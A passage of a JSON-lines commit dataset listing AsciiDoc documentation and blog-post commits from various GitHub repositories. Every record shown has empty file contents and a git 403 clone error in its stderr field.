news\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/01\/14\/clojure-2021-survey.adoc","new_file":"content\/news\/2021\/01\/14\/clojure-2021-survey.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"195fee6e6e70510f8c056fcc73e43a5a864f5d06","subject":"y2b create post 2.7GHz Quad-Core MacBook Pro Unboxing (Super MacBook Pro Project 2013)","message":"y2b create post 2.7GHz Quad-Core MacBook Pro Unboxing (Super MacBook Pro Project 2013)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-06-19-27GHz-QuadCore-MacBook-Pro-Unboxing-Super-MacBook-Pro-Project-2013.adoc","new_file":"_posts\/2013-06-19-27GHz-QuadCore-MacBook-Pro-Unboxing-Super-MacBook-Pro-Project-2013.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08aa61d7bf47c0af17747b00d76a36987e691e00","subject":"Update 2016-02-06-Maya-scene-cleanup.adoc","message":"Update 2016-02-06-Maya-scene-cleanup.adoc","repos":"Kif11\/Kif11.github.io,Kif11\/Kif11.github.io,Kif11\/Kif11.github.io,Kif11\/Kif11.github.io","old_file":"_posts\/2016-02-06-Maya-scene-cleanup.adoc","new_file":"_posts\/2016-02-06-Maya-scene-cleanup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Kif11\/Kif11.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f7984c9f02322ee9a564842f4235ff474ba36e3b","subject":"Update 2017-03-23-One-Time-Pad-by-Z3.adoc","message":"Update 
2017-03-23-One-Time-Pad-by-Z3.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-03-23-One-Time-Pad-by-Z3.adoc","new_file":"_posts\/2017-03-23-One-Time-Pad-by-Z3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"44c2192f362f7f167ed6460326365795f773aa93","subject":"Add instructions for running multibinder examples.","message":"Add instructions for running multibinder examples.\n","repos":"garyrussell\/spring-cloud-stream,pperalta\/spring-cloud-stream,dsyer\/spring-cloud-stream,mbogoevici\/spring-cloud-stream,markpollack\/spring-cloud-stream,markfisher\/spring-cloud-stream,dturanski\/spring-cloud-stream,garyrussell\/spring-cloud-stream,pperalta\/spring-cloud-stream,markfisher\/spring-cloud-stream,dsyer\/spring-cloud-stream,markpollack\/spring-cloud-stream,ghillert\/spring-cloud-streams,viniciusccarvalho\/spring-cloud-stream,markpollack\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,garyrussell\/spring-cloud-stream,mbogoevici\/spring-cloud-stream,dturanski\/spring-cloud-stream,markfisher\/spring-cloud-stream,viniciusccarvalho\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,ilayaperumalg\/spring-cloud-stream,dsyer\/spring-cloud-stream,ilayaperumalg\/spring-cloud-stream,viniciusccarvalho\/spring-cloud-stream,mbogoevici\/spring-cloud-stream,spring-cloud\/spring-cloud-stream,dturanski\/spring-cloud-stream,pperalta\/spring-cloud-stream","old_file":"spring-cloud-stream-samples\/multibinder-differentsystems\/README.adoc","new_file":"spring-cloud-stream-samples\/multibinder-differentsystems\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dturanski\/spring-cloud-stream.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"37308208a0b9fc98a1cfc3cb51823595070af70e","subject":"[doc] Add description of HOWL log internals","message":"[doc] Add description of HOWL log internals\n\ngit-svn-id: f3027bd689517dd712b868b0d3f5f59c3162b83d@1794325 13f79535-47bb-0310-9956-ffa450edef68\n","repos":"tomdw\/aries,tomdw\/aries,fwassmer\/aries,fwassmer\/aries,tomdw\/aries,tomdw\/aries,fwassmer\/aries,fwassmer\/aries","old_file":"transaction\/transaction-manager\/internals.adoc","new_file":"transaction\/transaction-manager\/internals.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tomdw\/aries.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"92f4652ca0e3134a8f248ce6450c95b8f328f82d","subject":"[WFLY-11622] Update documentation for multiple delivery groups in MDBs","message":"[WFLY-11622] Update documentation for multiple delivery groups in 
MDBs\n","repos":"iweiss\/wildfly,pferraro\/wildfly,iweiss\/wildfly,wildfly\/wildfly,iweiss\/wildfly,golovnin\/wildfly,jstourac\/wildfly,rhusar\/wildfly,pferraro\/wildfly,tadamski\/wildfly,tadamski\/wildfly,rhusar\/wildfly,xasx\/wildfly,pferraro\/wildfly,rhusar\/wildfly,jstourac\/wildfly,xasx\/wildfly,xasx\/wildfly,wildfly\/wildfly,iweiss\/wildfly,jstourac\/wildfly,pferraro\/wildfly,wildfly\/wildfly,rhusar\/wildfly,golovnin\/wildfly,golovnin\/wildfly,wildfly\/wildfly,jstourac\/wildfly,tadamski\/wildfly","old_file":"docs\/src\/main\/asciidoc\/_developer-guide\/ejb3\/Message_Driven_Beans_Controlled_Delivery.adoc","new_file":"docs\/src\/main\/asciidoc\/_developer-guide\/ejb3\/Message_Driven_Beans_Controlled_Delivery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wildfly\/wildfly.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"0b5f2f8d66182af1a1094ad9ca4dc68caa183e10","subject":"Add missing link to app.asciidoc in guide index","message":"Add missing link to app.asciidoc in guide index\n","repos":"a12n\/erlang.mk,rabbitmq\/erlang.mk,ingwinlu\/erlang.mk,hairyhum\/erlang.mk,jj1bdx\/erlang.mk,ninenines\/erlang.mk,bsmr-erlang\/erlang.mk,crownedgrouse\/erlang.mk,KrzysiekJ\/erlang.mk,nevar\/erlang.mk","old_file":"doc\/src\/guide\/book.asciidoc","new_file":"doc\/src\/guide\/book.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crownedgrouse\/erlang.mk.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"313224c6252af2f8be614fc70ae163ac64366606","subject":"Fix broken link for installing grafana","message":"Fix broken link for installing grafana\n","repos":"objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/hawkular-services\/docs\/quickstart-guide\/index.adoc","new_file":"src\/main\/jbake\/content\/hawkular-services\/docs\/quickstart-guide\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2fb8533965709e3cafc129b64d0e7046b1bc3c81","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/02\/18\/deref.adoc","new_file":"content\/news\/2022\/02\/18\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"d1286fd9403bf62ee79518877ac2d35c20c73ead","subject":"Update 2015-05-16-Faustino-loeza-Perez.adoc","message":"Update 
2015-05-16-Faustino-loeza-Perez.adoc","repos":"faustinoloeza\/blog,faustinoloeza\/blog,faustinoloeza\/blog","old_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faustinoloeza\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1fcafde034b26743fa6aaa48c93915c0d873ad10","subject":"Update 2018-02-23-make-book-manage-App.adoc","message":"Update 2018-02-23-make-book-manage-App.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c9929a08408023876eead6d3b9890507d7a0329","subject":"Update 2018-04-13-deploy-by-kubernetes.adoc","message":"Update 2018-04-13-deploy-by-kubernetes.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca769e2d748eeb6678136a11ffe3c968245973db","subject":"Update 2010-12-14-Some-Programming-Nuggets.adoc","message":"Update 2010-12-14-Some-Programming-Nuggets.adoc","repos":"bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io","old_file":"_posts\/2010-12-14-Some-Programming-Nuggets.adoc","new_file":"_posts\/2010-12-14-Some-Programming-Nuggets.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bigkahuna1uk\/bigkahuna1uk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa6a402673ad0b5eed5ea0c1dc97140892330197","subject":"Update 2018-06-13-Low-latency-Microservice.adoc","message":"Update 2018-06-13-Low-latency-Microservice.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-06-13-Low-latency-Microservice.adoc","new_file":"_posts\/2018-06-13-Low-latency-Microservice.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f9691f1e11f37d99fe122c1767b8618729ad4b3","subject":"y2b create post Gears of War 3 Controller Unboxing (Xbox 360)","message":"y2b create post Gears of War 3 Controller Unboxing (Xbox 
360)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-09-01-Gears-of-War-3-Controller-Unboxing-Xbox-360.adoc","new_file":"_posts\/2011-09-01-Gears-of-War-3-Controller-Unboxing-Xbox-360.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b487e269007c636b23c553f4e1dd05b7adff8765","subject":"Update 2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","message":"Update 2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","new_file":"_posts\/2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38652a677eac308ca1e42245712644b85f190cd0","subject":"Update 2016-02-13-Managing-Python-dependencies-with-git-submodules.adoc","message":"Update 2016-02-13-Managing-Python-dependencies-with-git-submodules.adoc","repos":"Kif11\/Kif11.github.io,Kif11\/Kif11.github.io,Kif11\/Kif11.github.io,Kif11\/Kif11.github.io","old_file":"_posts\/2016-02-13-Managing-Python-dependencies-with-git-submodules.adoc","new_file":"_posts\/2016-02-13-Managing-Python-dependencies-with-git-submodules.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Kif11\/Kif11.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f584eed306af11755ff3eacd0b99edddee01f3f","subject":"Update 2018-02-10-Machine-Learning-Minutely-stock-price-prediction.adoc","message":"Update 2018-02-10-Machine-Learning-Minutely-stock-price-prediction.adoc","repos":"kr-b\/kr-b.github.io,kr-b\/kr-b.github.io,kr-b\/kr-b.github.io,kr-b\/kr-b.github.io","old_file":"_posts\/2018-02-10-Machine-Learning-Minutely-stock-price-prediction.adoc","new_file":"_posts\/2018-02-10-Machine-Learning-Minutely-stock-price-prediction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kr-b\/kr-b.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"886267dd0f092857044f88932b695bd729b7dc35","subject":"Delete 2018-02-05-.adoc","message":"Delete 2018-02-05-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-05-.adoc","new_file":"_posts\/2018-02-05-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e769ed86330025676cd9cd5b7ca1f1ed38c13264","subject":"Update 2018-06-24-.adoc","message":"Update 
2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5d3eef6fa12a52150640dee06921f496167a9957","subject":"Update 2017-12-01-mov-to-gifanim.adoc","message":"Update 2017-12-01-mov-to-gifanim.adoc","repos":"YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io","old_file":"_posts\/2017-12-01-mov-to-gifanim.adoc","new_file":"_posts\/2017-12-01-mov-to-gifanim.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannDanthu\/YannDanthu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d9c6cfadfacefe8564f95afaaac9c26bbee2b2a3","subject":"update 2009-04-17-VisualEditor-Eclipse-vs-Matisse-Netbeans.adoc","message":"update 2009-04-17-VisualEditor-Eclipse-vs-Matisse-Netbeans.adoc\n","repos":"javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io","old_file":"_posts\/2009-04-17-VisualEditor-Eclipse-vs-Matisse-Netbeans.adoc","new_file":"_posts\/2009-04-17-VisualEditor-Eclipse-vs-Matisse-Netbeans.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/javathought\/javathought.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7cf7640f334ec5dad26d826eb526fa705be767b6","subject":"Update 2016-03-16-c1114.adoc","message":"Update 2016-03-16-c1114.adoc","repos":"LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io,LihuaWu\/lihuawu.github.io","old_file":"_posts\/2016-03-16-c1114.adoc","new_file":"_posts\/2016-03-16-c1114.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LihuaWu\/lihuawu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e3bcc5ac2fd4f2defe08810bd82e936eb4a89c5f","subject":"Update 2016-7-2-thinphp.adoc","message":"Update 2016-7-2-thinphp.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-7-2-thinphp.adoc","new_file":"_posts\/2016-7-2-thinphp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1792db9c511844744f366c5d4f34de190253c56b","subject":"Fix Documentacion.","message":"Fix Documentacion.\n","repos":"fvasquezjatar\/fermat-unused,fvasquezjatar\/fermat-unused","old_file":"fermat-documentation\/fermat_dap\/flujo general\/version1.asciidoc","new_file":"fermat-documentation\/fermat_dap\/flujo general\/version1.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fvasquezjatar\/fermat-unused.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea052980879c307da5745f2d846deb9e9b87be06","subject":"[DOCS] Fixed bad link","message":"[DOCS] Fixed bad link\n\nOriginal commit: elastic\/x-pack-elasticsearch@bb733b7877af84fcfe5691272eea3df97e089a90\n","repos":"gingerwizard\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch","old_file":"docs\/en\/installing-xes.asciidoc","new_file":"docs\/en\/installing-xes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"87b5c981befba705e5a60524732d5042864190ae","subject":"y2b create post The Coolest Phone You\u2019ve Never Heard Of\u2026","message":"y2b create post The Coolest Phone You\u2019ve Never Heard Of\u2026","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-08-13-The-Coolest-Phone-Youve-Never-Heard-Of.adoc","new_file":"_posts\/2017-08-13-The-Coolest-Phone-Youve-Never-Heard-Of.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"12bee696ed7007210f52d4f2aa30c97a7117dc87","subject":"Delete the file at '_posts\/2017-03-23-One-Time-Pad-by-Z3.adoc'","message":"Delete the file at '_posts\/2017-03-23-One-Time-Pad-by-Z3.adoc'","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-03-23-One-Time-Pad-by-Z3.adoc","new_file":"_posts\/2017-03-23-One-Time-Pad-by-Z3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e48f60a89b2793ef7830317d17d1575d7c57bf1b","subject":"Update 2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","message":"Update 
2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","new_file":"_posts\/2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"394d1a51dc14359518003a1a80345d79ae758191","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f0d081595a0ca84759b26fa2277cc77b0e25b8f4","subject":"Update 2017-05-28-E-S-API.adoc","message":"Update 2017-05-28-E-S-API.adoc","repos":"Jekin6\/blog,Jekin6\/blog,Jekin6\/blog,Jekin6\/blog","old_file":"_posts\/2017-05-28-E-S-API.adoc","new_file":"_posts\/2017-05-28-E-S-API.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Jekin6\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b1a0380768ca6e004cd976e84ead5ceffefbbfdc","subject":"Update 2017-08-15-Azure-6.adoc","message":"Update 2017-08-15-Azure-6.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-15-Azure-6.adoc","new_file":"_posts\/2017-08-15-Azure-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aabe106a9ab18fbd798116acb7fee7f32fd628b5","subject":"Update 2018-09-25-Scratch.adoc","message":"Update 2018-09-25-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-09-25-Scratch.adoc","new_file":"_posts\/2018-09-25-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"19ce6594b8e53188bb273130d8167fe17ae72d62","subject":"Update 2015-02-06-the-memory-of-2014.adoc","message":"Update 2015-02-06-the-memory-of-2014.adoc","repos":"deepwind\/deepwind.github.io,deepwind\/deepwind.github.io,deepwind\/deepwind.github.io","old_file":"_posts\/2015-02-06-the-memory-of-2014.adoc","new_file":"_posts\/2015-02-06-the-memory-of-2014.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/deepwind\/deepwind.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"f644e7c3a667f37c63d29270dbaaa124e8474b92","subject":"Update 2015-10-02-When-Epiales-Calls.adoc","message":"Update 2015-10-02-When-Epiales-Calls.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-10-02-When-Epiales-Calls.adoc","new_file":"_posts\/2015-10-02-When-Epiales-Calls.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0e6c1bdf0ec8fa754337cb8346c86f8aee619c0","subject":"y2b create post HOLIDAY TECH DEALS","message":"y2b create post HOLIDAY TECH DEALS","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-11-27-HOLIDAY-TECH-DEALS.adoc","new_file":"_posts\/2015-11-27-HOLIDAY-TECH-DEALS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2cc051c15f5e14d8faf4dbf6263681c5114aadf9","subject":"Update 2016-09-26-GDG-Summit-ES-2016.adoc","message":"Update 2016-09-26-GDG-Summit-ES-2016.adoc","repos":"acien101\/acien101.github.io,acien101\/acien101.github.io,acien101\/acien101.github.io,acien101\/acien101.github.io","old_file":"_posts\/2016-09-26-GDG-Summit-ES-2016.adoc","new_file":"_posts\/2016-09-26-GDG-Summit-ES-2016.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/acien101\/acien101.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8937e1e64c210b0ea0fc8320ac5fe58d7844bb1a","subject":"Update 2017-07-02-Continuous-learnig.adoc","message":"Update 2017-07-02-Continuous-learnig.adoc\n","repos":"InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io","old_file":"_posts\/2017-07-02-Continuous-learnig.adoc","new_file":"_posts\/2017-07-02-Continuous-learnig.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InformatiQ\/informatiq.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5609a5db1028cd363076b3fca848bf84454e0a0b","subject":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","message":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e57d7547b6541448e62191b7e3c6ab6c8c007fbb","subject":"#2246 add document for application properties guide","message":"#2246 add document for application properties 
